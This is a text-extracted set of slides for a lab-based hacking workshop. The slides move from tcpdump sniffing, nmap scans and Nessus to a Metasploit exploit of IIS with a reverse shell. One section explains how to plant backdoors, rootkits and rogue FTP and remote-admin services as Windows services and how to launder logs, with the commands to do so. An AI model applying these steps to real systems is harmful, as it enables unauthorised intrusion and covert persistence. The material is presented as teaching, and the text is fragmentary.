Pwnage Workshop

From zero to hero Level 1 ScriptKiddie

Table of contents
‡ ‡ ‡ ‡ ‡ ‡ ‡ Legal Overview Requirements Entering the Lab The scenario 5 intro to backtrack Lets get started

Legal
To be able to join this workshop you have to agree that you are completely responsible about what are you doing after you left this room. We encourage you: don t use this tools and technics to be evil.

Overview
‡ This workshop is set in the earliest 2000 s, our aim is to let you know some hacking technics from basic networking to exploiting machines trough a hands on workshop. Enjoy!

7. 6. 5. Basic Microsoft Windows knowledge Basic Linux knowledge Basic Vmware knowledge Basic networking knowledge Patience Respect Then GOTO 5 ‡ Hardware: ± Computer/Laptop ± 2+ GB RAM ± Ethernet AND Wireless access ‡ Software: ± Vmware ± Virtualized version of Backtrack .Requirements ‡ Human: 1. 2. 4. 3.

Entering the Lab ‡ Identify your ethernet lan network. Bridged it with your ethernet lan. Just plug your ethernet cable in the designated swith. . ‡ Disable LAN tcp IPv4 & IPv6 ‡ Open Vmware Virtual Network Editor ‡ Identify or create a network.

. ‡ Select custom. and select the name of the network bridged to lan.Entering the Lab ‡ Go to your backtrack virtual machine and right click on the networking icon placed at the bottom right.

Storyline .

The scenario ‡ What you know. ± There should be something behind the switch. ± Everything else. . ‡ What you don t know.

5 intro to backtrack ‡ The /pentest/ directory Most of the programs can be run from shell ‡ The desktop (run startx on terminal) See multiples terminals at the same time and also for running Maltego .

dic ‡ Terminate running program ‡ Control + C ‡ And of course TAB for autocompleting and the arrow to use your previously typed commands .5 intro to backtrack ‡ Finding tools ± The $PATH ‡ echo $PATH ± The find command ‡ root@bt:~# find / -name nmap ‡ root@bt:~# find /pentest/ -name '*.

Challenge 6: Gain remote access. Challenge 5: Exploiting vulnerability. . Challenge 7: Remote network recognition. Challenge 8: Exploiting Remote machines. Challenge 3: Service recognition. Challenge 2: Detect/Define our victim. Challenge 4: Vulnerability detection.Lets get started ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address.

.

Challenge 1: Obtain IP address. ‡ Ifconfig eth0 up ± Assigning the right IP address to your pc. . So you are in the middle of idk just connected your plug and nothing happened. what can we do? ± Logging in Backtrack ‡ For user pass read the welcome screen in BT ± Bringing up your Ethernet interface.

Challenge 1: Obtain IP address. First we listen To be able to obtain a valid IP we can listen into the network and see if it give us some tipe of which one is the right IP range. ‡ Intro to Network Sniffers What are sniffers? Promiscuous mode ‡ Sniffing with Tcpdump .

Challenge 1: Obtain IP address. ‡ Intro to Network Sniffers What are sniffers? Promiscuous mode .

any (Pseudo-device that captures on all interfaces) 4. link-type EN10MB (Ethernet).lo ± Select the right device and start listening root@bt:~# tcpdump -i eth0 tcpdump: WARNING: eth0: no IPv4 address assigned tcpdump: verbose output suppressed. use -v or -vv for full protocol decode listening on eth0.Challenge 1: Obtain IP address. ‡ Sniffing with tcpdump ± List devices root@bt:~# tcpdump -D 1.eth0 2. capture size 96 bytes ± See something? See too much? Try filters root@bt:~# tcpdump -n arp -i eth0 root@bt:~# tcpdump -n tcp -i eth0 tcpdump -n tcp and dst port 23 -i eth0 .usbmon1 (USB bus number 1) 3.

Challenge 1: Obtain IP address.6/24 . You found the right IP range!!! ‡ Set up your ip address root@bt:~# ifconfig eth0 192.1.168.

Challenge 4: Vulnerability detection. Challenge 6: Gain remote access. . Challenge 5: Exploiting vulnerability. Challenge 2: Detect/Define our victim. Challenge 3: Service recognition.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 8: Exploiting Remote machines. Challenge 7: Remote network recognition.

.

± Netcat.Challenge 2: Detect/Define our victim. nmap. amap . ‡ The art of scanning: ± What is scanning ± Ping? Pong! ± Dissection of a scan one packet at time.

168.1 Host is up (0.104 Host is up (0.0/24 Starting Nmap 5. MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys) Nmap scan report for 192.168.69.35DC1 ( http://nmap.69. Nmap done: 256 IP addresses (3 hosts up) scanned in 3.168.org ) at 2011-07-14 15:58 EDT Nmap scan report for 192. MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor) Nmap scan report for 192.0031s latency).145 Host is up.0023s latency). ‡ Example: nmap -sn 192.69.69.168.Challenge 2: Detect/Define our victim. ± What is scanning ± Ping? Pong! ‡ Ping sweep: A method that can establish a range of IP addresses which map to live hosts.48 second .

Wireshark: View of a Ping sweep . ± Dissection of a ping sweep one packet at time.Challenge 2: Detect/Define our victim.

find your victim. .Challenge 2: Detect/Define our victim. ‡ Now it s your time.

Challenge 6: Gain remote access. Challenge 3: Service recognition. Challenge 5: Exploiting vulnerability. Challenge 7: Remote network recognition. Challenge 4: Vulnerability detection.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 2: Detect/Define our victim. . Challenge 8: Exploiting Remote machines.

.

Challenge 3: Service recognition. ‡ Ports & port scanning. ‡ Services ± What are services ± Detecting services ± Banner recognition .

ms-sql. (ftp. telnet. ± ± ± The Well Known Ports are those from 0 through 1023. such as Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). It is used by the transport protocols of the Internet Protocol Suite.Challenge 3: Service recognition. ‡ Ports ‡ Port: A port is an application serving as a communications endpoint. mysql) The Dynamic and/or Private Ports are those from 49152 through 65535 ‡ TCP & UDP http://www. and the Dynamic and/or Private Ports. tftp) The Registered Ports are those from 1024 through 49151 (socks .iana.org/assignments/port-numbers . ‡ The port numbers are divided into three ranges: the Well Known Ports. the Registered Ports.

104 Host is up (0.48 seconds .168.69.org ) at 2011-07-17 15:07 EDT Nmap scan report for 192.168.104 Starting Nmap 5.Challenge 3: Service recognition.041s latency).69.35DC1 ( http://nmap. Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor) Nmap done: 1 IP address (1 host up) scanned in 37. ‡ Port Scanning root@bt:~# nmap -n -p1-65535 192.

Challenge 3: Service recognition. 3 way handshake Wireshark port scan capture .

web. ‡ Services: ‡ Some services: ± Ssh. tftp .Challenge 3: Service recognition. authentication. dns. email. snmp. ftp. proxy. dhcp.

168. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5. Nmap done: 1 IP address (1 host up) scanned in 0.org ) at 2011-07-17 15:40 EDT Nmap scan report for 192.35DC1 ( http://nmap.104 Host is up (0. Please report any incorrect results at http://nmap.1p1 Debian 8 (protocol 2.0020s latency).69.Challenge 3: Service recognition.org/submit/ .0) MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor) Service Info: OS: Linux Service detection performed.17 seconds .168.104 Starting Nmap 5. ‡ Banner recognition root@bt:~# nmap -n -p22 -sV 192.69.

Wireshark service detection capture .Challenge 3: Service recognition.

Challenge 3: Service recognition. let s create a general knowledge of the results: ± How many machines? ± Which Oss? ± Which ports? ± Which Services? ± Which Software? ± Are server or desktop machines? . ‡ Closing chapter 3 ‡ After you got the results.

2 Free TIPs ‡ Browsing the services Browse 2 common services with their corresponding client Use netcat to connect to the services ‡ Why don t we try to recognize the SO running on each machine? Try: Nmap O host .Challenge 3: Service recognition.

Challenge 7: Remote network recognition. Challenge 6: Gain remote access. Challenge 2: Detect/Define our victim. . Challenge 5: Exploiting vulnerability.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 8: Exploiting Remote machines. Challenge 4: Vulnerability detection. Challenge 3: Service recognition.

.

implementation. ‡ What are vulnerabilities ± IETF RFC 2828 define vulnerability as: A flaw or weakness in a system's design. or operation and management that could be exploited to violate the system's security policy ‡ Playing with Nessus ± ± ± ± What is Nessus Installing Nessus on Backtrack Creating policies Understanding the results .Challenge 4: Vulnerability detection.

org register (as home user) ‡ Obtain your code (check inbox) ‡ Paste the command in a shell ‡ Go to create user ‡ Rebridge to your ethernet ‡ Re set to your first ip ‡ Nessus start ‡ Browse into https:yourip:8834 . ‡ Unbridge and bridge to your wireless ‡ dhcpclient ‡ Nessus.Challenge 4: Vulnerability detection. ± Installing Nessus on backtrack We are going to connect our backtrack machine to the public internet in order to retrieve Nessus from their home site. ‡ Playing with Nessus ± What is Nessus ‡ Is a vulnerability scanner bla bla bla.

‡ Now after you did it. ‡ Take 5 minutes to create your own policy (keep in mind the results from the previous stages). ‡ Playing with Nessus ± What is Nessus ± Installing Nessus on backtrack ± Creating policies ‡ The Nessus interface is kind of intuitive.Challenge 4: Vulnerability detection. please don t forget to also include the following plugins: ± ± ± ± CGI abuses RPC Web Servers Windows .

Challenge 4: Vulnerability detection. ‡ Playing with Nessus ± Installing Nessus on backtrack ± Creating policies ± Understanding the results ‡ If results !=0 then go read them. again take your time. ‡ From the results which machines are vulnerable? .

Challenge 4: Vulnerability detection. . Challenge 3: Service recognition. Challenge 5: Exploiting vulnerability. Challenge 8: Exploiting Remote machines.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 2: Detect/Define our victim. Challenge 6: Gain remote access. Challenge 7: Remote network recognition.

.

‡ Creating your hack-kit ‡ Using exploits: ± Simple exploits ± The Metasploit framework .Challenge 5: Exploiting vulnerability.

Hiding your stuff: Rootkits.Challenge 5: Exploiting vulnerability. ‡ Creating your hack-kit Hack-kit is your own set of tools. Services Packs. In general you would like to upload: ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Process/services tools: Lists/kill process. Maintaining access: Backdoors. for backdooring/administrating/protecting your new server you will upload after you break on a server. Covering tracks: Logs laundry. Administration tools: Access to remote desktop. File transfer tools: Normally an FTP. . Expansion tools: scanners and more exploits. Hardening: Patches.

as well starting remote recognaince.dll ± settings.exe ± raddrv.EXE ± TLIST. here is a solution.exe ‡ Client/Administration tools: Let you administrate remotely your rogue services ± Remote administrator 2.1 ± Serv-u administrator 3 ‡ Rogue FTP-server Simple and powerfull FTP server ± WINMGNT.dll ± r_server. This tools let you take a look from the command line about who is running on the remote server. Proposed tools ‡ Listing/killing process and port scanning.0 ± KILL.Challenge 5: Exploiting vulnerability.EXE ± ServUDaemon.EXE ± dfind.reg . telnet and file transfer capabilities included as well ± AdmDll.exe Fport 2.ini ‡ Rogue Remote Administration tool If you want remote desktop. ± Fport.

‡ So once you are in the remote shell. ± Installing rogue services The important capabilities of this rogues services are the chance to install them as services and from the command line. transfer your hackkit(pack.exe) and run the following commands . ‡ How to use the tools.Challenge 5: Exploiting vulnerability.

.122.reg C:\WINNT\system32>sqlsvc /install /silence ‡ Starting your rogue tools as services C:\WINNT\system32>net start serv-u The Serv-U FTP Server service is starting.exe 1 File(s) 496.exe (self extraction) C:\WINNT\system32>pack C:\WINNT\system32>dir winmgnt.836 bytes 0 Dir(s) 4. The Remote Administrator Service service was started successfully. The Serv-U FTP Server service was started successfully.exe Volume in drive C has no label.944 bytes free ‡ Installing the tools as services in the remote machine C:\WINNT\system32>winmgnt /i C:\WINNT\system32>regedit /s temp.836 Winmgnt. running a FTP server and access to the desktop. C:\WINNT\system32>net start r_server The Remote Administrator Service service is starting. ‡ Running the pack.066. Volume Serial Number is 2A1C-0AF4 Directory of C:\WINNT\system32 12/27/2003 01:22p 496. C:\WINNT\system32> Now you are able to use that remote machine at your own will.Challenge 5: Exploiting vulnerability.

.

Where you can find them. Why they are funny. ‡ ‡ ‡ ‡ What are exploits. ± Compiling ± Testing ± executing . How to use them.Challenge 5: Exploiting vulnerability.

The result of running the exploit (Remote access. or sequence of commands that takes advantage of a bug. This frequently includes such things as gaining control of a computer system. etc. a chunk of data. glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software. hardware. An exploit is a piece of software. ‡ What are exploits. DoS. allowing privilege escalation or a denial of service attack.Challenge 5: Exploiting vulnerability.) . data leak. or something electronic . privilege escalation. Types Exploits are commonly categorized and named by these criteria: ‡ ‡ ‡ The type of vulnerability they exploit Whether they need to be run on the same machine as the program that has the vulnerability (local) or can be run on one machine to attack a program running on another machine (remote).

‡ Why they are funny. ‡ What are exploits.Challenge 5: Exploiting vulnerability. and/or become administrator). . ± Because they could give us unauthorized access to something (data. remote machine.

How an exploit looks like.Challenge 5: Exploiting vulnerability. .

.Challenge 5: Exploiting vulnerability.

Meanwhile in a very very very secure server .Challenge 5: Exploiting vulnerability.

.Challenge 5: Exploiting vulnerability.

You bad service. Back to our very very very secure server. thanks for the info.Challenge 5: Exploiting vulnerability. spited a file and then went to sleep? COMMON . Well.

.

.Challenge 5: Exploiting vulnerability. ‡ Why they are funny. ‡ Where you can find them. ‡ What are exploits.

one of them is exploit-db. ‡ Where you can find them.com with a huge lists of exploits for multiple softwares.Challenge 5: Exploiting vulnerability. . There are multiple sites.

And we also have Metasploit. Open source vs closed/compiled ones. Protected.Challenge 5: Exploiting vulnerability. fakes. bobytraps and rootkiteds. ‡ Some others things about exploits: ± ± ± ± Public exploits vs private exploits. .

± Compiling ± Testing ± executing .Challenge 5: Exploiting vulnerability. Why they are funny. Where you can find them. How to use them. ‡ ‡ ‡ ‡ What are exploits.

profit. Using Metasploit ‡ Setting up metasploit to attack a machine: Select the exploit. ± ± ± ± First.168. the victim.11 ± ± Set the payload set payload /generic/shell_reverse_tcp Ask for the config Set LHOST YOURIP Exploit! NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT .Challenge 5: Exploiting vulnerability. and what do you want to do on that machine.1. you have to know the module name (its on the nessus output) Run metasploit /pentest/exploits/framework3/msfconsole Search for the exploit show exploits Start using the exploit Info windows/iis/ms01_026_dbldecode Use windows/iis/ms01_026_dbldecode ± Ask for the config Show options Minumin requirements set RHOST 192.

Challenge 5: Exploiting vulnerability. .

.Challenge 5: Exploiting vulnerability.

Challenge 3: Service recognition. Challenge 7: Remote network recognition. Challenge 5: Exploiting vulnerability. Challenge 8: Exploiting Remote machines. . Challenge 2: Detect/Define our victim. Challenge 6: Gain remote access. Challenge 4: Vulnerability detection.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address.

.

You hacked it. now what? ‡ Installing channels or something.Challenge 6: Gain remote access. serv-u. netcat . remote administrator. right.

. Challenge 7: Remote network recognition. Challenge 6: Gain remote access. Challenge 3: Service recognition. Challenge 5: Exploiting vulnerability. Challenge 4: Vulnerability detection. Challenge 8: Exploiting Remote machines.Mission List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 2: Detect/Define our victim.

.

We have to go deeper ‡ Scanning the LAN Here we are going to use some tool from our hackkit. dfind .Challenge 7: Remote network recognition.

Mission List
‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 2: Detect/Define our victim. Challenge 3: Service recognition. Challenge 4: Vulnerability detection. Challenge 5: Exploiting vulnerability. Challenge 6: Gain remote access. Challenge 7: Remote network recognition. Challenge 8: Exploiting Remote machines.

Challenge 8: Exploiting Remote machines.
‡ So you detected some machines, you detected some services, now its time to exploit them. ‡ What tools can we use to exploit remote vulnerabilities?

Challenge 8: Exploiting Remote machines.
‡ Exploiting remote Windows Machines
± Analyzing dfind results ± Searching for vulnerability s info available ± Prepare the exploit ± Profit

Challenge 8: Exploiting Remote machines.
‡ Exploiting remote Linux Machines
± Analyzing dfind results ± Searching for vulnerability s info available ± Prepare the exploit ± Profit

Once you have one ‡ Man in the middle attacks (ettercap) ‡ Dns poisoning ‡ Exploiting browsers .Challenge 8: Exploiting Remote machines.

.

.

Super Secret Network Topology .

6.c Wu-ftpd v2.Machines and their vulnerabilities ‡ ‡ ‡ Exploiting Windows NT 4 from Nessus to Metasploit. . Backtrack Nessus Metasploit autopwn: KABOOM!!! Hacking windows 2000.0 remote root exploit.2 7350wu. (IIS) Red Hat 6.

Challenge 2: Detect/Define our victim. Challenge 3: Service recognition. Challenge 4: Vulnerability detection.Challenge List ‡ ‡ ‡ ‡ ‡ ‡ ‡ ‡ Challenge 1: Obtain IP address. Challenge 7: Remote network recognition. . Challenge 5: Exploiting vulnerability. Challenge 8: Exploiting Remote machines. Challenge 6: Gain remote access.

Sign up to vote on this title
UsefulNot useful